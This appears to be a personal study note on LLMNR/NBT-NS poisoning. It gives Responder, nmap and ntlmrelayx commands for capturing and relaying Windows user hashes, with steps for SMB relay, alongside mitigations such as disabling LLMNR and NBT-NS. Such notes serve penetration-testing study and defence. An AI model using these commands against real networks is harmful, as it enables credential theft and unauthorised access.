LLMNR Poisoning
What is LLMNR?
- it is Link Local Multicast Name Resolution - it's basically DNS.
- It's used when DNS fails to identify hosts and send User hashes.
- previously NBT-NS
---
responder.py -I tun0 -rdw
- Run this in the morning or when the traffics are busy to catch user activities.
- capture user hashes when a user type the wrong IP's itc
- Capture hashes > hashcat it.
-
User type in login info, then sends attacker hashes.
To mitigate LLMNR posoning, you have to disable LLMNR and NBT-NS
To disable LLMNR --> Turn off multicast NAME resolution under local computer policy > computer configuration > administrative templates > network > DNS client in the group policy editor.
To disable NBT-NS, navigate to Network connections < network adapter properties > TCP/IPv4 properties > advanced tab > WINS tab and selevt disable netBIOS over TCP/IP/
What if a company cannot disable LLMNR/NBT-NS?
- 1.Enable network access control:
- 2.require strong user passwords (longer than 14 characters)
instead of cracking hashes that we capture with responder, we can relay the hashes to specific machines and potentially gain access
Requirements - SMB signing must me disabled on the target
- Relayed user credentials must be admin on machine
Steps:
1. go to file explorer > network and enable network sharing
2. follow the steps below:
- 1.Discover if a host's SMB signing is disabled
- NESSUS
- Nmap (use specififc script ) --
nmap --script=smb2-security-mode.nse -p445 192.168.1.0/24 - Github script that does
Create a txt file that contains a victim's machine's IP.
Edit a responder config file -
gedit /etc/responder/Responder.confturn off SMB and HTTP.
Run the responder:
responder -I eth0 -rdwv- set a relay machine
└─# ntlmrelayx.py -tf target.txt -smb2support - you have to use two user machines with adminin priviledge for this attack to work! (use one to relay in)
- enter the ip address in the file explorer on the other user machine on the target.
now you got hashes!